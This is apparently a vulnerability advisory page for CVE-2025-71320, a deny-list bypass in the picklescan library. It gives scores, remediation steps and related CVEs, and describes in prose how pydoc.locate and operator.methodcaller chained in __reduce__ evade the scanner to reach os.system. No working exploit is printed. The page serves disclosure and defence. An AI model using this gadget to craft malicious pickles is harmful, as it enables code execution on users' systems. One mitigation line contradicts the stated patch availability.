Which versions of picklescan are affected by CVE-2025-71320?

Picklescan, a Python security library used to validate data files in ML and data pipelines, contains a critical flaw that attackers can exploit to bypass its security checks and gain code execution…. A patch is available.

How to fix or mitigate CVE-2025-71320?

24 hours: Audit and document all Picklescan deployments (versions before 0.0.33); restrict network access and apply principle-of-least-privilege to all systems performing pickle deserialization; implement strict input validation to reject pickles from untrusted sources. 7 days: Execute pickle deserialization operations within isolated, low-privilege containers; evaluate and begin transition to safer serialization formats (JSON, Protocol Buffers, MessagePack) where architecturally feasible. 30 days: Monitor Picklescan repository for release of version 0.0.33 or later; prepare and execute immediate patching of all Picklescan installations upon availability; implement defense-in-depth via network segmentation around model-loading and data-processing services.

picklescan CVE-2025-71320

Q: What is the CVSS score of CVE-2025-71320?

CVE-2025-71320 has a CVSS 4.0 base score of 9.3 (Critical). CVSS vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. EPSS exploitation probability: 0.6%.

CRITICAL

Incomplete List of Disallowed Inputs (CWE-184)

2026-06-17 VulnCheck

RCE Picklescan

9.3

CVSS 4.0 · Vendor: VulnCheck

Severity by source

Vendor (VulnCheck) PRIMARY

9.3 CRITICAL

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

vuln.today AI

8.8 HIGH

Network-delivered malicious pickle, no auth, but victim must load the file (UI:R); full RCE yields C/I/A High, scope unchanged.

3.1 AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

4.0 AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

None

Scope

Lifecycle Timeline

Source Code Evidence Fetched

Jun 17, 2026 - 16:45 vuln.today

Analysis Generated

Jun 17, 2026 - 16:45 vuln.today

DescriptionCVE.org

picklescan before 0.0.33 contains an incomplete deny-list that fails to block pydoc.locate and operator.methodcaller functions, allowing attackers to bypass security checks. Remote attackers can craft malicious pickle files using these unblocked functions to achieve arbitrary code execution when the pickle is deserialized.

AnalysisAI

Arbitrary code execution in picklescan before 0.0.33 allows remote attackers to bypass the scanner's malicious-pickle detection by using pydoc.locate and operator.methodcaller, which were missing from the deny-list. Any downstream tool that trusts a 'clean' picklescan verdict and then deserializes the pickle (e.g., ML model loaders) will execute attacker-supplied code. Publicly available exploit code exists (GHSA PoC), and CVSS 4.0 is rated 9.3 Critical, though no public exploit identified at time of analysis in CISA KEV.

Technical ContextAI

picklescan is a Python package (cpe:2.3:a:picklescan:picklescan) widely used in the ML ecosystem - notably by Hugging Face - to statically inspect pickle files for dangerous opcodes/imports before they are unpickled into model weights. It relies on an explicit deny-list of module.function pairs treated as dangerous. CWE-184 (Incomplete List of Disallowed Inputs) applies directly: the list enumerated only some pydoc and operator functions, so pydoc.locate (which dynamically resolves any module name to a live module object, e.g. 'os') and operator.methodcaller (which returns a callable that invokes a named method on its argument, e.g. 'system') passed through unflagged. Chained together inside __reduce__, they reproduce the classic os.system gadget while evading the scanner.

RemediationAI

Vendor-released patch: upgrade picklescan to 0.0.33 or later (pip install -U 'picklescan>=0.0.33'), which extends the deny-list for the pydoc and operator modules to a wildcard so any use of those modules is flagged as dangerous; the fix is tracked in PR https://github.com/mmaitre314/picklescan/pull/53 and commit 70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab, with full details in advisory https://github.com/mmaitre314/picklescan/security/advisories/GHSA-84r2-jw7c-4r5q. If immediate upgrade is not possible, treat picklescan 'safe/suspicious' verdicts as untrusted for pickle files originating from external sources, and instead refuse to deserialize raw pickles - prefer safetensors or other non-executable model formats, which eliminates the pickle attack surface entirely at the cost of needing format-converted artifacts. As a narrower stopgap, sandbox unpickling in a no-network, read-only container (limits blast radius but does not prevent in-container code execution), or extend a local fork's deny-list to treat pydoc.* and operator.* as dangerous (matches the upstream fix but must be maintained manually).

More from same product – last 7 days

CVE-2026-3490 CRITICAL Act Now

10.0 Jun 17

Remote code execution against users of picklescan versions prior to 1.0.4 is achievable by smuggling any blocked functio

CVE-2026-53874 CRITICAL Act Now

9.3 Jun 17

Arbitrary code execution in picklescan versions prior to 1.0.1 allows attackers to bypass the scanner's malicious pickle

CVE-2025-71321 CRITICAL Act Now

9.3 Jun 17

Arbitrary file write in picklescan before 0.0.33 lets attackers bypass the tool's dangerous-call blocklist by abusing di

CVE-2025-71323 CRITICAL Act Now

9.3 Jun 17

Remote code execution in picklescan before 0.0.33 enables attackers to bypass the tool's malicious-pickle detection by s

CVE-2025-71325 CRITICAL Act Now

9.3 Jun 17

Detection bypass in picklescan versions prior to 0.0.27 allows attackers to smuggle malicious Python pickle files past t

CVE-2025-71320 vulnerability details – vuln.today

Back

picklescan CVE-2025-71320

Severity by source

CVSS VectorVendor: VulnCheck

Lifecycle Timeline

DescriptionCVE.org

AnalysisAI

Technical ContextAI

RemediationAI

More from same product – last 7 days

Share

External POC / Exploit Code